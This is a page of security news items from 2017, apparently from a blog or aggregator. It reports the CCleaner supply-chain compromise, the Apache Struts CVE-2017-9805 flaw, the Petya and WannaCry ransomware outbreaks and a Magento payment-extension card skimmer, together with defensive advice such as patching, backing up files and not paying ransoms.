The widely used and popular application, with over 2 billion downloads, created by Piriform and recently acquired by Avast, that allows users to clean up their system to optimize and enhance performance has been hacked.

If you have downloaded or updated CCleaner application on your computer between August 15 and September 12 of this year from its official website, your computer has been compromised.

Detected on the 13th September, the malicious version of CCleaner contains a multi-stage malware payload that steals data from infected computers and sends it to attacker's remote command-and-control servers.

The malicious software was programmed to collect a large number of user data, including:

Computer name
List of installed software, including Windows updates
List of all running processes
IP and MAC addresses

Additional information like whether the process is running with admin privileges and whether it is a 64-bit system

Affected users are strongly recommended to update their CCleaner software to version 5.34 or higher, in order to protect their computers from being compromised.

A critical remote code execution vulnerability in the popular Apache Struts web application framework, allowing a remote attacker to run malicious code on the affected servers has been discovered.

Apache Struts is a free, open-source, Model-View-Controller (MVC) framework for developing web applications in the Java programming language, which supports REST, AJAX, and JSON.

The vulnerability (CVE-2017-9805) is a programming blunder that resides in the way Struts processes data from an untrusted source. Specifically, Struts REST plugin fails to handle XML payloads while deserializing them properly.
 
All versions of Apache Struts since 2008 (Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12) are affected, leaving all web applications using the framework’s REST plugin vulnerable to remote attackers.

According to one of the security researchers at LGTM, who discovered the flaw, the Struts framework is being used by "an incredibly large number and variety of organisations," including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS.

"On top of that, [the vulnerability] is incredibly easy for an attacker to exploit this weakness: all you need is a web browser," Man Yue Mo, an LGTM security researcher said.

All an attacker needs is to submit a malicious XML code in a particular format to trigger the vulnerability on the targeted server.

Successful exploitation of the vulnerability could allow an attacker to take full control of the affected server, eventually letting the attacker infiltrate into other systems on the same network.
 
Many Java applications have since been affected by multiple similar vulnerabilities in recent years.

Since this vulnerability has been patched in Struts version 2.5.13, administrators are strongly advised to upgrade their Apache Struts installation as soon as possible.

More technical details about the vulnerability and proof-of-concept have not been published by the researchers yet, giving admins enough time to upgrade their systems.

 

Organizations in Europe and the US have been crippled by a ransomware attack known as ‘Petya’. The malicious software has spread through large firms including the advertiser WPP, food company Mondelez, legal firm DLA Piper and Danish shipping and transport firm Maersk, leading to PCs and data being locked up and held for ransom.

It’s the second major global ransomware attack in the last two months. In early May, Britain’s National Health Service (NHS) was among the organizations infected by WannaCry, which used a vulnerability first revealed to the public as part of a leaked stash of NSA-related documents released online in April by a hacker group calling itself the Shadow Brokers. Like WannaCry, ‘Petya’ spreads rapidly through networks that use Microsoft Windows.

The ransomware takes over computers and demands $300, paid in Bitcoin. The malicious software spreads rapidly across an organization once a computer is infected using the EternalBlue vulnerability in Microsoft Windows.

The ransomware infects computers and then waits for about an hour before rebooting the machine. While the machine is rebooting, you can switch the computer off to prevent the files from being encrypted and try and rescue the files from the machine, though if you are infected and the system reboots with the ransom note, don’t pay the ransom – the “customer service” email address has been shut down so there’s no way to get the decryption key to unlock your files anyway. Disconnect your PC from the internet, reformat the hard drive and reinstall your files from a backup. Back up your files regularly and keep your anti-virus software up to date. 

A massive ransomware campaign hit computer systems of hundreds of private companies and public organizations across the globe – which is believed to be the most massive ransomware delivery campaign to date.

The Ransomware in question has been identified as a variant of ransomware known as WannaCry (also known as 'Wana Decrypt0r,' 'WannaCryptor' or 'WCRY').

Like other ransomware variants, WannaCry also blocks access to a computer, encrypts its files and demands money (bitcoin) to unlock it.
 
Once infected with the WannaCry ransomware, victims are asked to pay up to $300 in bitcoin in order to remove the infection from their PCs; otherwise, their PCs are render edunusable, and their files remain locked.
 

How to Protect Yourself from WannaCry

Magento Realex Payments extension hacked to steal payment card data. Experts at Sucuri are observing massive attacks.

Cybercriminals target the Magento platform to steal credit card data. The thieves  have been abusing a payment module to steal payment card data from online shops running on popular Magento e-commerce platform.

According to experts at security firm Sucuri, the hackers are targeting module is the Realex Payments Magento extension (SF9), that integrates with the Realex Realauth Remote payment gateway.

The extension allows the administrators of Magento installs to process mail and telephone orders by entering the payment details.

The experts highlighted that the Realex Payments extension is not affected by any vulnerability, the attackers are abusing it once the Magento installation is compromised

The researchers at Sucuri noticed that crooks added a malicious function called sendCcNumber() to an SF9 file named Remote.php.

The function gathers personal and financial data entered by users and sends it back to an email address controlled by the attacker.

Page 1 of 3